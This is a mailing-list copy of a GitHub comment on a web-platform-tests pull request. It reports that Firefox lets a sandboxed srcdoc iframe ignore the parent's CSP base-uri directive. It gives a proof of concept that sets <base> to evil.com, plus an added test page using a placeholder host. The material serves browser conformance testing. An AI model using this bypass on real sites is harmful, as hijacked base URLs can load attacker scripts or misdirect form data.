Re: [CSP] Test for base-uri and sandboxed iframes. (#4915)

I confirm that Firefox allows setting `<base>` for sandboxed iframes, ignoring the `base-uri` directive of the parent page.

PoC:

```html
<meta charset="utf-8">
<meta http-equiv="Content-Security-Policy" content="base-uri 'none'">

<body>
    <script>
        // Sandboxed srcdoc iframe; the srcdoc document should inherit the parent's CSP.
        var i = document.createElement('iframe');
        i.sandbox = 'allow-scripts';
        // Split the closing tag so the outer parser does not end this script early.
        i.srcdoc = '<base href="https://evil.com/"><script>console.log(document.baseURI);</sc' + 'ript>';
        document.body.appendChild(i);
    </script>
</body>
```

This prints `https://evil.com/` to the console, while if the `i.sandbox` line is commented out we get a CSP violation, as it should be.

View on GitHub: https://github.com/w3c/web-platform-tests/pull/4915#issuecomment-286382069
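A self-contained test page for the behaviour reported above (an added example, not code from the PR or from the comment): it loads the unsandboxed and the `allow-scripts` srcdoc cases side by side and reports PASS only when the parent's `base-uri` policy was inherited, i.e. the injected `<base>` was ignored. The host `https://evil.example/` is a placeholder.

```html
<!doctype html>
<meta charset="utf-8">
<meta http-equiv="Content-Security-Policy" content="base-uri 'none'">
<title>base-uri inheritance into srcdoc iframes</title>
<pre id="log"></pre>
<script>
// Constructed test page, not code from the PR or the comment above.
// Each case loads a srcdoc iframe that tries to set <base href="https://evil.example/">
// (placeholder host). The iframe reports its effective document.baseURI and whether a
// base-uri violation event fired; the parent marks the case PASS when its own policy was
// inherited (the <base> was ignored) and FAIL otherwise.
const BAD_BASE = 'https://evil.example/';
const cases = [
  { name: 'no sandbox',              sandbox: null },
  { name: 'sandbox="allow-scripts"', sandbox: 'allow-scripts' },
];

function report(line) {
  document.getElementById('log').textContent += line + '\n';
}

// Script for the inner document. It is placed before <base> so the violation listener
// is registered before that element is parsed. "__ID__" is replaced per case.
const innerDoc = `
  <script>
    let violated = false;
    document.addEventListener('securitypolicyviolation', e => {
      if (e.violatedDirective === 'base-uri') violated = true;
    });
    window.addEventListener('load', () => {
      parent.postMessage({ id: __ID__, baseURI: document.baseURI, violated }, '*');
    });
  <\/script>
  <base href="${BAD_BASE}">`;

window.addEventListener('message', e => {
  if (!e.data || typeof e.data.id !== 'number') return;   // ignore unrelated messages
  const c = cases[e.data.id];
  const inherited = e.data.baseURI !== BAD_BASE;
  report(`${c.name}: baseURI=${e.data.baseURI} violation=${e.data.violated} ` +
         `-> ${inherited ? 'PASS' : 'FAIL (parent base-uri not enforced)'}`);
});

cases.forEach((c, id) => {
  const frame = document.createElement('iframe');
  if (c.sandbox !== null) frame.sandbox = c.sandbox;
  frame.srcdoc = innerDoc.replace('__ID__', String(id));
  document.body.appendChild(frame);
});
</script>
```

Serve the file over HTTP rather than opening it from disk, since `file:` origins can change how sandboxed frames and violation events behave.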

Received on Tuesday, 14 March 2017 10:33:03 UTC